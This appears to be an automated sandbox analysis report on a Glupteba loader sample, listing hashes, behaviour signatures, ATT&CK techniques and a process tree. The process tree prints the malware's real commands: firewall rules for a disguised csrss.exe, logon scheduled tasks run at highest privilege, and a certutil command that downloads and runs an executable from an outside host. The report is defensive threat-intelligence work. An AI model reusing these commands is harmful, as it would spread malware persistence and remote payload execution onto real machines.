Analysis

  • max time kernel
    149s
  • max time network
    153s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20220414-en
  • submitted
    24-05-2022 15:18

General

  • Target

    bc20d017a6767bb0a8072340e29b633f3057940ced871219dc4cd3fab83b722e.exe

  • Size

    3.9MB

  • MD5

    65d01de320e3a436c774fb370f7a6019

  • SHA1

    b4c32f9e8c074ff67e4f3508ece73243c0d98d48

  • SHA256

    bc20d017a6767bb0a8072340e29b633f3057940ced871219dc4cd3fab83b722e

  • SHA512

    7901aa50f747df43091f59b69aed427ea68bff92375f7b00013c0cfe31c86fede543107e447d2308469ef07d8630046221592e5e512957563cd07817cc05878c

Malware Config

Signatures

  • Glupteba

    Glupteba is a modular loader written in Golang with various components.

  • Glupteba Payload 6 IoCs
  • Suspicious use of NtCreateUserProcessOtherParentProcess 4 IoCs
  • Executes dropped EXE 3 IoCs
  • Modifies Windows Firewall 1 TTPs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Modifies boot configuration data using bcdedit 1 IoCs
  • Suspicious use of SetThreadContext 3 IoCs
  • Drops file in Windows directory 2 IoCs
  • Creates scheduled task(s) 1 TTPs 2 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Modifies data under HKEY_USERS 64 IoCs
  • Suspicious behavior: EnumeratesProcesses 8 IoCs
  • Suspicious use of AdjustPrivilegeToken 17 IoCs
  • Suspicious use of WriteProcessMemory 52 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\bc20d017a6767bb0a8072340e29b633f3057940ced871219dc4cd3fab83b722e.exe
    "C:\Users\Admin\AppData\Local\Temp\bc20d017a6767bb0a8072340e29b633f3057940ced871219dc4cd3fab83b722e.exe"
    1⤵
    • Suspicious use of SetThreadContext
    • Suspicious use of WriteProcessMemory
    PID:4884
    • C:\Users\Admin\AppData\Local\Temp\bc20d017a6767bb0a8072340e29b633f3057940ced871219dc4cd3fab83b722e.exe
      "C:\Users\Admin\AppData\Local\Temp\bc20d017a6767bb0a8072340e29b633f3057940ced871219dc4cd3fab83b722e.exe"
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:4572
      • C:\Users\Admin\AppData\Local\Temp\bc20d017a6767bb0a8072340e29b633f3057940ced871219dc4cd3fab83b722e.exe
        "C:\Users\Admin\AppData\Local\Temp\bc20d017a6767bb0a8072340e29b633f3057940ced871219dc4cd3fab83b722e.exe"
        3⤵
        • Suspicious use of SetThreadContext
        • Suspicious use of WriteProcessMemory
        PID:4168
        • C:\Users\Admin\AppData\Local\Temp\bc20d017a6767bb0a8072340e29b633f3057940ced871219dc4cd3fab83b722e.exe
          "C:\Users\Admin\AppData\Local\Temp\bc20d017a6767bb0a8072340e29b633f3057940ced871219dc4cd3fab83b722e.exe"
          4⤵
          • Adds Run key to start application
          • Drops file in Windows directory
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of WriteProcessMemory
          PID:3472
          • C:\Windows\system32\cmd.exe
            C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="CloudNet" dir=in action=allow program="C:\Users\Admin\AppData\Roaming\57c765cfdfac\57c765cfdfac\57c765cfdfac.exe" enable=yes"
            5⤵
            • Suspicious use of WriteProcessMemory
            PID:2488
            • C:\Windows\system32\netsh.exe
              netsh advfirewall firewall add rule name="CloudNet" dir=in action=allow program="C:\Users\Admin\AppData\Roaming\57c765cfdfac\57c765cfdfac\57c765cfdfac.exe" enable=yes
              6⤵
                PID:3588
            • C:\Windows\system32\cmd.exe
              C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
              5⤵
              • Suspicious use of WriteProcessMemory
              PID:4764
              • C:\Windows\system32\netsh.exe
                netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
                6⤵
                  PID:3864
              • C:\Windows\rss\csrss.exe
                C:\Windows\rss\csrss.exe ""
                5⤵
                • Executes dropped EXE
                • Suspicious use of SetThreadContext
                • Suspicious use of WriteProcessMemory
                PID:1844
                • C:\Windows\rss\csrss.exe
                  C:\Windows\rss\csrss.exe ""
                  6⤵
                  • Executes dropped EXE
                  • Modifies data under HKEY_USERS
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  • Suspicious use of WriteProcessMemory
                  PID:2340
                  • C:\Windows\SYSTEM32\schtasks.exe
                    schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
                    7⤵
                    • Creates scheduled task(s)
                    PID:4460
                  • C:\Windows\SYSTEM32\schtasks.exe
                    schtasks /CREATE /SC ONLOGON /RL HIGHEST /RU SYSTEM /TR "cmd.exe /C certutil.exe -urlcache -split -f https://biggames.online/app/app.exe C:\Users\Admin\AppData\Local\Temp\csrss\scheduled.exe && C:\Users\Admin\AppData\Local\Temp\csrss\scheduled.exe /31340" /TN ScheduledUpdate /F
                    7⤵
                    • Creates scheduled task(s)
                    PID:4436
                  • C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe
                    "C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe"
                    7⤵
                    • Executes dropped EXE
                    PID:3712
                  • C:\Windows\system32\bcdedit.exe
                    C:\Windows\Sysnative\bcdedit.exe /v
                    7⤵
                    • Modifies boot configuration data using bcdedit
                    PID:1876
      • C:\Windows\system32\svchost.exe
        C:\Windows\system32\svchost.exe -k netsvcs -p -s seclogon
        1⤵
        • Suspicious use of NtCreateUserProcessOtherParentProcess
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:4752

      Network

      MITRE ATT&CK Matrix ATT&CK v6

      Execution

      Scheduled Task

      1
      T1053

      Persistence

      Modify Existing Service

      1
      T1031

      Registry Run Keys / Startup Folder

      1
      T1060

      Scheduled Task

      1
      T1053

      Privilege Escalation

      Scheduled Task

      1
      T1053

      Defense Evasion

      Modify Registry

      1
      T1112

      Discovery

      Query Registry

      1
      T1012

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe
        Filesize

        1.7MB

        MD5

        13aaafe14eb60d6a718230e82c671d57

        SHA1

        e039dd924d12f264521b8e689426fb7ca95a0a7b

        SHA256

        f44a7deb678ae7bbaaadf88e4c620d7cdf7e6831a1656c456545b1c06feb4ef3

        SHA512

        ade02218c0fd1ef9290c3113cf993dd89e87d4fb66fa1b34afdc73c84876123cd742d2a36d8daa95e2a573d2aa7e880f3c8ba0c5c91916ed15e7c4f6ff847de3

      • C:\Windows\rss\csrss.exe
        Filesize

        3.9MB

        MD5

        65d01de320e3a436c774fb370f7a6019

        SHA1

        b4c32f9e8c074ff67e4f3508ece73243c0d98d48

        SHA256

        bc20d017a6767bb0a8072340e29b633f3057940ced871219dc4cd3fab83b722e

        SHA512

        7901aa50f747df43091f59b69aed427ea68bff92375f7b00013c0cfe31c86fede543107e447d2308469ef07d8630046221592e5e512957563cd07817cc05878c

      • C:\Windows\rss\csrss.exe
        Filesize

        3.9MB

        MD5

        65d01de320e3a436c774fb370f7a6019

        SHA1

        b4c32f9e8c074ff67e4f3508ece73243c0d98d48

        SHA256

        bc20d017a6767bb0a8072340e29b633f3057940ced871219dc4cd3fab83b722e

        SHA512

        7901aa50f747df43091f59b69aed427ea68bff92375f7b00013c0cfe31c86fede543107e447d2308469ef07d8630046221592e5e512957563cd07817cc05878c

      • C:\Windows\rss\csrss.exe
        Filesize

        3.9MB

        MD5

        65d01de320e3a436c774fb370f7a6019

        SHA1

        b4c32f9e8c074ff67e4f3508ece73243c0d98d48

        SHA256

        bc20d017a6767bb0a8072340e29b633f3057940ced871219dc4cd3fab83b722e

        SHA512

        7901aa50f747df43091f59b69aed427ea68bff92375f7b00013c0cfe31c86fede543107e447d2308469ef07d8630046221592e5e512957563cd07817cc05878c

      • memory/1844-155-0x0000000001600000-0x00000000019A6000-memory.dmp
        Filesize

        3.6MB

      • memory/1844-148-0x0000000000000000-mapping.dmp
      • memory/1876-162-0x0000000000000000-mapping.dmp
      • memory/2340-157-0x0000000000400000-0x0000000000B0F000-memory.dmp
        Filesize

        7.1MB

      • memory/2340-151-0x0000000000000000-mapping.dmp
      • memory/2488-143-0x0000000000000000-mapping.dmp
      • memory/3472-138-0x0000000000000000-mapping.dmp
      • memory/3472-144-0x0000000000400000-0x0000000000B0F000-memory.dmp
        Filesize

        7.1MB

      • memory/3588-145-0x0000000000000000-mapping.dmp
      • memory/3712-160-0x0000000000000000-mapping.dmp
      • memory/3864-147-0x0000000000000000-mapping.dmp
      • memory/4168-137-0x0000000000000000-mapping.dmp
      • memory/4168-141-0x00000000011C3000-0x0000000001569000-memory.dmp
        Filesize

        3.6MB

      • memory/4436-159-0x0000000000000000-mapping.dmp
      • memory/4460-158-0x0000000000000000-mapping.dmp
      • memory/4572-130-0x0000000000000000-mapping.dmp
      • memory/4572-136-0x0000000000400000-0x0000000000B0F000-memory.dmp
        Filesize

        7.1MB

      • memory/4572-134-0x0000000000400000-0x0000000000B0F000-memory.dmp
        Filesize

        7.1MB

      • memory/4572-131-0x0000000000400000-0x0000000000B0F000-memory.dmp
        Filesize

        7.1MB

      • memory/4764-146-0x0000000000000000-mapping.dmp
      • memory/4884-135-0x0000000001600000-0x0000000001CF5000-memory.dmp
        Filesize

        7.0MB

      • memory/4884-133-0x0000000001252000-0x00000000015F8000-memory.dmp
        Filesize

        3.6MB